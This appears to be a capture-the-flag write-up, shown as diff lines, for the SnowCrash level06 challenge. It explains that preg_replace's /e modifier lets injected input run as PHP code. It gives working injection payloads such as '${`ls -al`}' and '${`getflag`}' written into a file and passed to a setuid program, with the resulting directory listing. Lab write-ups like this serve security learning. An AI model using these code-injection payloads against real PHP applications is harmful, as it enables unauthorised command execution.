lo-jo/SNOWCRASH/level06/ressources/level06.md

     level06@SnowCrash:~$ echo "THIS IS A TEST : [x HELLO ... @@@]" > /tmp/testa
     level06@SnowCrash:~$ ./level06 /tmp/testa
     THIS IS A TEST : HELLO  x  x  x   y y y

+## Security problem

+The use of the `/e` modifier in `preg_replace` is highly insecure as it allows execution of arbitrary PHP code, which means that whatever is parsed is transformed into php code.
+This can lead to security vulnerabilities such as code injection.

+Good news for us...
+For example :

+    level06@SnowCrash:~$ echo 'TRYING THIS STUFF [x ${`ls -al`} ]' > /tmp/test
+    level06@SnowCrash:~$ ./level06 /tmp/test
+    PHP Notice:  Undefined variable: total 24
+    dr-xr-x---+ 1 level06 level06  140 Mar  5  2016 .
+    d--x--x--x  1 root    users    340 Aug 30  2015 ..
+    -r-x------  1 level06 level06  220 Apr  3  2012 .bash_logout
+    -r-x------  1 level06 level06 3518 Aug 30  2015 .bashrc
+    -rwsr-x---+ 1 flag06  level06 7503 Aug 30  2015 level06
+    -rwxr-x---  1 flag06  level06  356 Mar  5  2016 level06.php
+    -r-x------  1 level06 level06  675 Apr  3  2012 .profile
+     in /home/user/level06/level06.php(4) : regexp code on line 1
+    TRYING THIS STUFF

+Now all we have do do is the same but with the getflag program, and we have our token.

+    level06@SnowCrash:~$ echo 'TRYING THIS STUFF [x ${`getflag`} ]' > /tmp/test